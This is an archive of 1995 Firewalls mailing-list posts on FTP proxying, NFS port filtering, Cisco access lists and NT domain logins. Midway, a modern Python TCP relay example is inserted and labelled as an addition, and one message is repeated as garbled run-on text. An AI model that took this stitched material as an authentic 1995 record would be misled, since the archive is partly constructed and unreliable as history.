Received: from relay2.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.125109.0.8805; Wed, 04 Oct 1995 12:51:09 -0500
Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzjyf20945; Wed, 4 Oct 1995 00:28:48 -0400
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA05431 for firewalls-outgoing; Tue, 3 Oct 1995 20:52:03 -0700
Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA05424 for ; Tue, 3 Oct 1995 20:52:00 -0700
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id WAA09928 for GreatCircle.COM!firewalls; Tue, 3 Oct 1995 22:33:46 -0500
Received: by ris1.nmti.com (smail2.5) id AA18501; 3 Oct 95 19:37:40 CDT (Tue)
Received: by sonic.nmti.com; id AA11758; Tue, 3 Oct 1995 20:04:29 -0500
From: peter@nmti.com (Peter da Silva)
Message-Id: <9510040104.AA11758@sonic.nmti.com.nmti.com>
Subject: Re: FW to FW FTP w/ no port > 1023
To: sgcccdc@citec.qld.gov.au (Colin Campbell)
Date: Tue, 3 Oct 1995 20:04:28 -0500 (CDT)
Cc: wbunting@ch.inri.com, firewalls@GreatCircle.COM
In-Reply-To: <9510022336.AA14998@citecub.citec.qld.gov.au> from "Colin Campbell" at Oct 3, 95 09:36:16 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 341
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > 3. Do not use FTP and write a TCP application that uses only a single TCP
> > port for data and control. Issues: Time + $$ no compatibility. Benefit:
> > solves the problem.

FSP and HTTP are both candidates for this application. And they've already been written.

NNTP would work as well, and can be proxied with a simple plug gateway.

From firewalls-owner Thu Oct 5 10:30:55 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA29732 for firewalls-outgoing; Thu, 5 Oct 1995 10:11:27 -0700
Received: from inms-db.os.dhhs.gov (inms-db.os.dhhs.gov [158.70.254.28]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA29723 for ; Thu, 5 Oct 1995 10:11:20 -0700
Received: by inms-db.os.dhhs.gov (4.1/2.9-eef) id AA07052; Thu, 5 Oct 95 12:51:05 EDT
Date: Thu, 5 Oct 1995 12:51:04 -0400 (EDT)
From: Alan Dowd
To: Parks Fields , firewalls@greatcircle.com
Subject: Re: Security policy ?
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 5 Oct 1995, Alan Dowd wrote:

[... snip ...]
>
> Somewhere or another I tripped upon an archive of security policies from
> educational institutions, but I could not locate it on a real fast search
> for this reply. Perhaps, with the knowledge that it exists, you can find
> it with a bit of Web-walking.
>

And two minutes later I found the reference:

http://www.rpi.edu/Internet/Guides/decemj/icmc/organizations-standards.html

Regards,
Al Dowd
Unix Network Security
Management Systems Applications, Inc.

From firewalls-owner Thu Oct 5 10:35:16 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26767 for firewalls-outgoing; Thu, 5 Oct 1995 08:55:00 -0700
Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26751 for ; Thu, 5 Oct 1995 08:54:54 -0700
Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080000.0.12306; Thu, 05 Oct 1995 10:53:37 -0500
From: joe@ns.via.net (Joe McGuckin)
To: cmilam@cap.au.af.mil (cmilam), firewalls@GreatCircle.COM (firewalls)
Message-ID: <1995Oct05.080000.0.12306@cap.au.af.mil>
X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Organization: Civil Air Patrol National Headquarters
Date: Thu, 05 Oct 1995 10:53:37 -0500
Subject: Need Windows FTP client source
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk
Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080028.0.8843; Thu, 05 Oct 1995 08:00:28 -0500
Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.071240.0.11908; Thu, 05 Oct 1995 08:00:28 -0500
From: joe@ns.via.net (Joe McGuckin)
To: cmilam@cap.au.af.mil , firewalls@GreatCircle.COM (firewalls)
Message-ID: <1995Oct05.071240.0.11908@cap.au.af.mil>
X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Organization: Civil Air Patrol National Headquarters
Date: Thu, 05 Oct 1995 08:00:28 -0500
Subject: Need Windows FTP client source
Received: from relay3.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.070658.0.8812; Thu, 05 Oct 1995 07:06:59 -0500
Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQzjxg07039; Tue, 3 Oct 1995 18:08:55 -0400
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23435 for firewalls-outgoing; Tue, 3 Oct 1995 13:47:43 -0700
Received: from ns.via.net (ns.via.net [140.174.204.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23422 for ; Tue, 3 Oct 1995 13:47:38 -0700
Received: (from joe@localhost) by ns.via.net (8.6.9/8.6.9) id NAA07589 for firewalls@GreatCircle.COM; Tue, 3 Oct 1995 13:46:08 -0700
Date: Tue, 3 Oct 1995 13:46:08 -0700
From: Joe McGuckin
Message-Id: <199510032046.NAA07589@ns.via.net>
To: firewalls@GreatCircle.COM
Subject: Need Windows FTP client source
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I need a Windows FTP client that can do SNK authentication. I want to use it with the FWTK ftp-gw proxy.

The problem is that most of the GUI based Windows FTP clients don't have a command line or a logging window to view status messages, etc.

Any suggestions?
-joe
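Peter da Silva's point above, that a protocol carrying commands and data on one TCP port (NNTP, HTTP, FSP) needs nothing more than a "simple plug gateway" at the firewall, as an added example. This is not FWTK's plug-gw and not code from the thread: it is a minimal relay that accepts on the firewall side, connects to one fixed destination configured by the administrator, and copies bytes both ways. The listening address, the destination and the echo service standing in for the inside server are constructed so the demo runs entirely on loopback.

```python
"""Minimal TCP plug gateway for a single-port protocol (added example)."""
import socket
import threading

BUFSIZE = 4096

# Relayed connections as (client address, destination); a real plug gateway
# would syslog these so the firewall keeps an audit trail of who went where.
CONNECTION_LOG = []


def _pump(src, dst):
    """Copy bytes src -> dst until src reaches EOF, then half-close dst so the
    far side sees the same EOF instead of hanging."""
    try:
        while True:
            data = src.recv(BUFSIZE)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _serve_one(client, dest):
    """Relay one accepted client to the single configured destination."""
    try:
        upstream = socket.create_connection(dest, timeout=5)
    except OSError:
        client.close()
        return
    upstream.settimeout(None)
    CONNECTION_LOG.append((client.getpeername(), dest))
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)   # client -> destination, returns at client EOF
    back.join()               # destination -> client, returns at server EOF
    client.close()
    upstream.close()


def _listener(bind_addr):
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(bind_addr)
    ls.listen(5)
    return ls


def _accept_forever(ls, handler):
    def loop():
        while True:
            try:
                conn, _ = ls.accept()
            except OSError:
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return ls.getsockname()


def start_plug(dest, bind_addr=("127.0.0.1", 0)):
    """Start the plug in the background; returns the (host, port) it listens on.
    Every client goes to `dest` and nowhere else: the client never names a
    destination, which is what keeps a plug gateway small enough to audit."""
    return _accept_forever(_listener(bind_addr), lambda c: _serve_one(c, dest))


def start_echo_server(bind_addr=("127.0.0.1", 0)):
    """Constructed stand-in for the single-port service behind the plug."""
    def handle(conn):
        with conn:
            while True:
                data = conn.recv(BUFSIZE)
                if not data:
                    break
                conn.sendall(data)
    return _accept_forever(_listener(bind_addr), handle)


def relay_roundtrip(payload=b"GROUP comp.security.firewalls\r\n"):
    """Push `payload` through plug -> echo server and return what came back."""
    plug_addr = start_plug(start_echo_server())
    with socket.create_connection(plug_addr, timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)   # done sending; now drain the reply to EOF
        received = b""
        while True:
            chunk = c.recv(BUFSIZE)
            if not chunk:
                break
            received += chunk
    return received


if __name__ == "__main__":
    print(relay_roundtrip())
```

The whole firewall-side logic is `_pump` twice; compare that with FTP, where the gateway must also arrange for a second, separately negotiated connection in the opposite direction.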
From firewalls-owner Thu Oct 5 11:10:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26265 for firewalls-outgoing; Thu, 5 Oct 1995 08:40:21 -0700
Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26258 for ; Thu, 5 Oct 1995 08:40:15 -0700
Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124656.0.12147; Thu, 05 Oct 1995 10:38:59 -0500
From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor)
To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls)
Message-ID: <1995Oct04.124656.0.12147@cap.au.af.mil>
X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Organization: Civil Air Patrol National Headquarters
Date: Thu, 05 Oct 1995 10:38:59 -0500
Subject: re: Encryption Strength
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk
Received: from spaatz.cap.af.mil by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124345.0.8756; Wed, 04 Oct 1995 12:43:45 -0500
Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123823.0.11762; Wed, 04 Oct 1995 12:43:45 -0500
From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor)
To: cmilam@cap.au.af.mil , firewalls@greatcircle.com (firewalls)
Message-ID: <1995Oct04.123823.0.11762@spaatz.cap.af.mil>
X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Organization: Civil Air Patrol National Headquarters
Date: Wed, 04 Oct 1995 12:43:45 -0500
Subject: re: Encryption Strength
Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123619.0.8704; Wed, 04 Oct 1995 12:36:20 -0500
Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjzx29201; Wed, 4 Oct 1995 11:18:20 -0400
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA14097 for firewalls-outgoing; Wed, 4 Oct 1995 06:47:14 -0700
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA14083 for ; Wed, 4 Oct 1995 06:47:10 -0700
Date: Wed, 4 Oct 1995 9:45:44 -0400 (EDT)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <951004094544.2105ed38@hobbes.orl.mmc.com>
Subject: re: Encryption Strength
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Would it suffice to say that it was good enough for NSA - and that it is the
>*only* Internet firewall used in a NSA-approved configuration? In a public
>forum, this is probably all I can say.

No,

a) Cryptic remarks like that have no place on a public forum IMNSHO and are considered free of content. Better not to be said at all.

b) Was talking to X-3 (dept id, not a code name 8*) yesterday and it was not mentioned. Asked specifically about firewalls (true those folks do not volunteer and I was asking about another subject but did ask specifically which firewalls had been "examined").

c) "Security by obscurity" rates a "Run, do not Walk".

d) "Assume" you refer to the MISSI stuff approved for connection of up-to-Secret LANs to unclassified. Those I know of still require an out-of-channel exchange to take place to define "trust".

e) The NSA/NIST/NCSA conference in Baltimore next week will be a good place to discuss such things (plug). Vendor suites with open bars particularly appreciated 8*). Is Tuesday 10th - Friday 13th at the convention center at the Inner Harbour. Don't miss Phillips.

Warmly,
Padgett
Those I know of still require an out-of-channel exchange to take place to define "trust". e) The NSA/NIST/NCSA conference in Baltimore next week will be a good place to discuss such things (plug). Vendor suites with open bars particularly appreciated 8*). Is Tuesday 10th - Friday 13th at the convention center at the Inner Harbour. Don't miss Phillips. Warmly, Padgett From firewalls-owner Thu Oct 5 11:14:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27265 for firewalls-outgoing; Thu, 5 Oct 1995 09:09:32 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA27251 for ; Thu, 5 Oct 1995 09:09:25 -0700 Date: Thu, 5 Oct 1995 12:07:48 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951005120748.21066a30@hobbes.orl.mmc.com> Subject: Re: FTPing through a smart firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Vessa commented that this seemed difficult (someone else's post): > slope indeed. IBM's NAT does FTP proxying via DNS tricks and temporary > address assignments, and accomplishes its goals without any layering > violations -- in particular the user data is never interpreted. Really not difficult at all provided standard conventions are followed: Node makes Port 21 connection to DE along with PORT command. Firewall sees this and watches for return from same DE port 20 addressed to same node. Can assume from the requested port on the internal node is the requested one, never needs to read/interpret the PORT command since the response header contains all necessary port information (and is good to open data channel only if command channel was previously opened). 
Warmly, Padgett

From firewalls-owner Thu Oct 5 11:16:33 1995
Date: 4 Oct 1995 12:46:35 -0500
From: "Pat Heinle"
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V4 #573

Reply to: RE>Firewalls-Digest V4 #573
From: pheinle@mitre.org
Subject: RE> Borderware vs. Firewall-1

Mr. Tate asks:

I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen?

rtate@folio.com

--

Robert,

"Info Security News" just had a supplement to their magazine for Sept/Oct. 95 entitled "Internet Security." Within the "Internet Security" supplement was a section, "Shopping for Firewalls", which contained a matrix of a majority of the current firewall products and their attributes. It might provide some additional insight.

In addition to your Security Policy, which Luc noted in his response, another issue to consider is how well the Firewall product adjusts as your enterprise expands.

Good luck.

Patty

--------------------------------------
Date: 10/4/95 11:34 AM
To: Pat Heinle
From: Firewalls@GreatCircle.COM

!!! Original message was too large. !!!
!!! It is contained in the enclosure whose name !!!
!!! is the same as the subject of this message. !!!
!!! A preview of the message follows:

Firewalls-Digest        Wednesday, 4 October 1995        Volume 04 : Number 573

In this issue:

-No Subject-
IRC
FLEXlm with proxy ...?
Re: NFS
Need Windows FTP client source
Borderware (was: Information, We want information)
Re: Encryption strength
Borderware vs. Firewall-1
Exact format for subscribing the info security list.
re: Encryption strength
re re nfs
Re: Mail Proxy
Re: FW to FW FTP w/ no port > 1023
re: Encryption strength
re: network address translation
RE: Borderware vs. Firewall-1
[none]
Re: Encryption strength
Re: Mail proxy

See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues.

----------------------------------------------------------------------

From: Joseph Urban
Date: 3 Oct 95 14:12:00
Subject: -No Subject-

subscribe firewalls-digest

------------------------------

From: oddboy@vegas.com
Date: Tue, 3 Oct 1995 11:42:44 -0700
Subject: IRC

I find myself in the position of having to put up a private IRC server (private being not connected to either Undernet or Efnet). Basically this is to allow "chat" forums for a few of my clients. I would like to make these chat lines live outside of my firewall (and plan on it) but am curious what I should watch out for in terms of folks being able to hack through and into an OS. (I run Solaris 2.4 but I think the IRC server will run on a DEC box running OSF/DecUnix.) Any and all info will be greatly appreciated.

Gideon Wober
Systems Administrator
Digitainment Corporation

------------------------------

From: jordan@Heuristicrat.COM (Jordan M. Hayes)
Date: Tue, 3 Oct 95 12:09:16 PDT
Subject: FLEXlm with proxy ...?

Anyone built a FLEXlm proxy for FWTK?

/jordan

------------------------------

From: Doug Hughes
Date: Tue, 3 Oct 1995 13:42:56 -0500
Subject: Re: NFS

>
>I am sure that this topic has been beaten to death, so if someone would
>just point me at the discussion (or tell me that there is no solution)
>I would be happy to take it from there. I remember reading a paper a
>couple years ago describing why NFS could never be made secure, but for
>the life of me I can't seem to find it now.
>
>The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half
>dozen file systems that are exported read-only to all the other machines
>in the domain. I would like to restrict their mounting to machines within
>the domain while maintaining connectivity to the outside world.
>SUN's software does not support this option, it only allows specifying
>specific machine names, and the list of *all* machine names overflows
>some internal limit in SUN's software.
>
>[ The machine uses DNS and not YP, it is rumored that possibly with YP one
>can get by this limit, but I have no interest in adding YP to my list of
>problems. ]
>
>So, the Questions
>
> (1) WITHOUT resorting to a firewall, is there any way to accomplish
>what I want to do?
>
> (2) If not, can it be done with a `simple' packet filter, or does it
>require a full blown firewall?
>
>
> Reg.Clemens
> clemens@dwf.com
>
>
>

Without necessarily resorting to a firewall, you can have your router to the outside world block:

  port 2049/udp - NFS
  port 111 udp/tcp - Sun RPC
  source routed packets
  outside packets with internal IP source addresses (IP spoofing)

This helps prevent a great deal of the most common attacks on NFS by preventing it getting outside your domain at the interface to the Internet. Also, installing the replacement tcp_wrappered version of portmap on your NFS servers from ftp.win.tue.nl is a good thing to do. This way you can limit what networks are able to send RPC requests to your server.
- --
____________________________________________________________________________
Doug Hughes                                 Engineering Network Services
System/Net Admin                            Auburn University
doug@eng.auburn.edu
Apple T-shirt on Win95 - "Been there, done that"

------------------------------

From: Joe McGuckin
Date: Tue

From firewalls-owner Thu Oct 5 11:20:37 1995
Date: Tue, 3 Oct 1995 13:46:08 -0700
From: joe@ns.via.net (Joe McGuckin)
To: firewalls@GreatCircle.COM
Subject: Need Windows FTP client source

I need a Windows FTP client that can do SNK authentication. I want to use it with the FWTK ftp-gw proxy. The problem is that most of the GUI-based Windows FTP clients don't have a command line or a logging window to view status messages, etc.

Any suggestions?

-joe

From firewalls-owner Thu Oct 5 12:02:37 1995
Date: Thu, 5 Oct 1995 22:38:04 +0400
From: forster@ns2.emirates.net.ae (Andrew & Terri Forster)
To: firewalls@greatcircle.com
Subject: Copy of RFC1597

Being new to the net (only being in the UAE) since August, I'm interested in locating a copy of RFC1597. Any assistance as to where I can find it would be appreciated.
Thanks in Advance

AMF
==========================================================================
Andrew M Forster
Email: forster@emirates.net.ae
Phone: +9712 262556 or +9712 453613
Fax: +9712 465344
==========================================================================

From firewalls-owner Thu Oct 5 13:23:24 1995
Date: Thu, 5 Oct 95 15:45:50 EDT
From: bnowlin@nyjets.lerc.nasa.gov (Ben Nowlin)
To: forster@ns2.emirates.net.ae (Andrew & Terri Forster)
Cc: firewalls@greatcircle.com
Subject: Re: Copy of RFC1597

>
> Being new to the net ( only being in the UAE ) since August I'm interested in
> locating a copy of RFC1597. Any assistance as to where I can find it would be
> appreciated.
>
>
> Thanks in Advance
>
> AMF
> ==========================================================================
> Andrew M Forster
> Email: forster@emirates.net.ae
> Phone: +9712 262556 or +9712 453613
> Fax: +9712 465344
> ==========================================================================
>

Hello Andrew:

RFC1597's subject title is "Address Allocation for Private Internets". There are undoubtedly many places to get it (i.e. there used to be when I pulled it down!!). Ftp to the site ds.internic.net in the subdirectory rfc. Alternately you can go to the web site http://www.ds.internic.net and look where the RFC's are located. It's a searchable index.

Ben
--
______________________________________________________________________________
Ben Nowlin                  | If you don't get what you want in life, it's either
NASA Lewis Research Center  | a sign that you seriously didn't want it, or that
ben@lerc.nasa.gov           | you tried to BARGAIN over the PRICE.
______________________________________________________________________________

From firewalls-owner Thu Oct 5 14:01:08 1995
Date: Thu, 5 Oct 1995 13:23:48 -0700
From: "Greg King (Exchange)"
To: "firewalls@greatcircle.com", "mark.horn1@jsc.nasa.gov"
Subject: RE: Technical details of NT Domains..

To log on to an NT domain you make an RPC call to the domain server. The RPC to log on is TCP. The datagrams to discover the DC to log on to are UDP.
If you need more info please let me know

Greg King
Microsoft
BackOffice Capacity Planning

----------
From: mark.horn1@jsc.nasa.gov[SMTP:mark.horn1@jsc.nasa.gov]
Sent: Wednesday, October 04, 1995 12:00 PM
To: firewalls@greatcircle.com
Subject: Technical details of NT Domains..

Hello,

We have some users who need to login to a Windows NT domain that has been set up here.

We currently have an IP firewall installed. This firewall is installed on our LAN and protects us from the Internet. Since there isn't a site wide firewall, it also protects us from the rest of JSC. It's a screened host gateway (nomenclature taken from Marcus J. Ranum's "Thinking About Firewalls"). Currently, only IP is filtered at our firewall. All non-IP protocols are passed through. All non-IP protocols are filtered at the site's connection to the Internet.

Now, it turns out that my users can't login to an NT domain. I wouldn't have expected this because I assumed that NT would have used NetBEUI or some such other non-IP protocol to communicate. After some experimentation, I've discovered that I need to set up the following for this to work:

a) Each Win95 machine needs to have a WINS server configured
b) UDP needs to be wide open to that Win95 machine.

It looks like WINS is a UDP based protocol, and it manages the name resolution for the NT domain. Then, using some unknown protocol, our machines talk to the NT domain server for authentication. From there, they talk to the individual disk servers in the NT domain over NetBEUI. (All of this is not much more than a Wild Ass Guess (tm))

So, the question is can anyone tell me the specifics of how one logs into an NT domain? In particular, what are the details of the data exchange? What I'm looking for is something along the lines of how Brent Chapman describes protocols in his tutorials (e.g. NTP servers send to & from UDP port 123, NTP clients send to UDP 123, and from random UDP port >1023). Does anyone know how logging into an NT domain utilizes UDP?

If WINS is the only thing using UDP, has anyone set up udprelay to act as a proxy for it?

Thanks in advance.

--
Mark Horn (sparkie)
horn@mickey.jsc.nasa.gov
http://tommy.jsc.nasa.gov/~horn
mark.horn1@jsc.nasa.gov
Free Advice and Opinions -- Refunds Available

From firewalls-owner Thu Oct 5 16:02:14 1995
Date: 5 Oct 1995 14:47:09 U
From: "Dominy Leigh"
To: Firewalls@GreatCircle.COM
Subject: RE: WWW & Proxy Servers

May want to research Raptor's Eagle Firewall, they're at www.raptor.com. This family of products allows restrictions by username.

_______________________________________________________________________________
From: stuart@loddon.demon.co.uk
Date: Wed, 4 Oct 95 13:29:38 PDT
Subject: WWW & Proxy Servers

Apologies if the following questions have been asked before - if they have, I can't find them!

i) Is/Are there any proxy servers for WWW to restrict access to the WWW on a username basis AND to further restrict use of 'sub-protocols' supported by WWW such as ftp, gopher ... again on a username basis?

ii) If yes to i), can you provide pointers please?

iii) If no to i), is the requirement technically feasible - if so, any clues?

iv) If the above has been done, has it been integrated with strong authentication tokens e.g. SecurID, Digital Pathways or even S/Key?
TIA

- -------------------------------------
Name: Stuart Broderick
E-mail: stuart@loddon.demon.co.uk
Date: 10/04/95:13:29:38
This site is not affiliated with any other in demon.co.uk.
- -------------------------------------

From firewalls-owner Thu Oct 5 16:02:35 1995
Date: Thu, 5 Oct 95 15:44:52 PDT
From: tox@remarque.berkeley.edu
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V4 #576
In-Reply-To: Your message of Thu, 5 Oct 1995 09:45:37 -0700

Regarding the ISDN dialin to a Novell network as being a possible end-run around the firewall:

Point out to your Netware person that various flavors of Netware have not been infallible in rejecting bad root logon attempts. Depending upon the version running there, and which patches you have applied, root logon attempts w/ a bad password will most likely occasionally (especially if stressed) be authenticated by mistake. If you are going to place that level of faith in the scheme, talk to Novell or one of the better Platinum resellers to make sure your faith is founded.

If the ISDN solution you are looking at is more along the lines of an ether bridge than a shell, it's possible that you would also be left open to a denial of service attack by known schemes where crafted service advertisement packets can cause the server to suffer from a resource depletion severe enough to render it unusable for hours after such an attack has ended.

I don't speak for Novell or my present employer. These are just some of my observations from having worked with Netware in the past. These problems may have been addressed more thoroughly in the last year than I'm aware of. Still, this is my $.02.

Good luck,

Tox Gunn

***********************************************
* Tox Gunn .......tox@remarque.berkeley.edu  *
* "Your sanity is not my responsibility!"    *
***********************************************

From firewalls-owner Thu Oct 5 16:30:12 1995
Date: Fri, 6 Oct 95 9:03:08 EST
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
To: ilias.liakopoulos@telecom.at (Ilias Liakopoulos)
Cc: firewalls@greatcircle.com
Subject: Re: cisco router extended access-list question

Hi,

First I am assuming you have a cisco with two interfaces. If you don't I think you should get one. If you are not using both, you should be.

I think you are getting more than you want from your filters because you are only filtering on one interface. You really should be using two.
For the purposes of the following discussion, I will assume that there are two interfaces; inside and outside. It doesn't really matter whether outside is an ethernet or serial. Further, both interfaces should use INCOMING filters. Thus what you really want for mail only access is:

    interface `outside'
     ip address 'outside address' 'some mask'
     ip access-group 101 in

    interface `inside'
     ip address 'inside address' 'some mask'
     ip access-group 102 in

    (1) access-list 101 permit tcp any gt 1023 'mailhost' 0.0.0.0 eq 25
    (2) access-list 101 permit tcp any eq 25 'mailhost' 0.0.0.0 gt 1023 established
    (3) access-list 102 permit tcp 'mailhost' 0.0.0.0 gt 1023 any eq 25
    (4) access-list 102 permit tcp 'mailhost' 0.0.0.0 eq 25 any gt 1023

They operate as follows:

(1) allows any host to connect to your 'mailhost' on port 25.
(2) allows the return packets from any host to which your mailhost is connected, when your mailhost initiated the connection
(3) allows your mailhost to connect to any external machine on port 25
(4) allows return packets from the mailhost to any host which has connected

Thus (1) and (4) are complementary - to allow a connection to your mailhost (1) the return packets must get out (4). And, (2) and (3) are complementary - to allow your mailhost to send mail (3) the return packets must be able to get in (2).

I think that is right :-). Anyone care to comment?

Whenever I try and work out things like this, I always draw a picture, eg: The arrows indicate the direction of the 'connection'. Remember that tcp is two-way traffic.

                 I want to send and receive mail
                /                              \
        remote mailhost                  remote mailhost
           tcp=25                           tcp>1023
             ^                                 |
             |                                 |
             |(2)                              V(1)
    ----------------------------------------------------
                           router
    ----------------------------------------------------
             ^(3)                              |(4)
             |                                 |
             |                                 V
           tcp>1023                          tcp=25
        local mailhost                   local mailhost

Remembering that tcp requires two-way traffic and that the return packets always have the ACK bit set (established) it becomes very easy to do the filters.
Sometimes it requires some work to determine all the connections (eg ftp) but a picture will never steer you wrong. Colin

> Hello,
>
> I have set up an access-list like the example in UnileverCD
> for allowing only SMTP connections (the IP addrs are invented):
>
> access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established
> access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25
>
> SMTP works but with this config I tried telnet and it also works.
> this is not acceptable and if I remove the established line ->
> nothing works.
> the interface config:
>
> interface Ethernet0
> ip address 2.2.3.2 'some adr mask'
> ip access-group 102 out
>
> have I done something wrong in the config or is this a bug
> in our version? :
> [chomp]

From firewalls-owner Thu Oct 5 17:00:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA15117 for firewalls-outgoing; Thu, 5 Oct 1995 16:38:50 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA15110 for ; Thu, 5 Oct 1995 16:38:39 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA07122; Fri, 6 Oct 1995 09:32:08 +1000 Received: from citecuf.citec.qld.gov.au(147.132.176.10) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma007118; Fri Oct 6 09:31:43 1995 Received: from jaykay.citec.qld.gov.au (jaykay.citec.qld.gov.au [131.242.4.117]) by citecuf.citec.qld.gov.au (8.6.10/8.6.10) with SMTP id JAA29494; Fri, 6 Oct 1995 09:35:50 +1000 Message-Id: <199510052335.JAA29494@citecuf.citec.qld.gov.au> From: "John Kidston" To: joe@ns.via.net (Joe McGuckin) Date: Fri, 6 Oct 1995 09:36:13 +1000 Subject: Re: Need Windows FTP client source Reply-to: j.kidston@citec.qld.gov.au CC: firewalls@GreatCircle.com Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: joe@ns.via.net (Joe
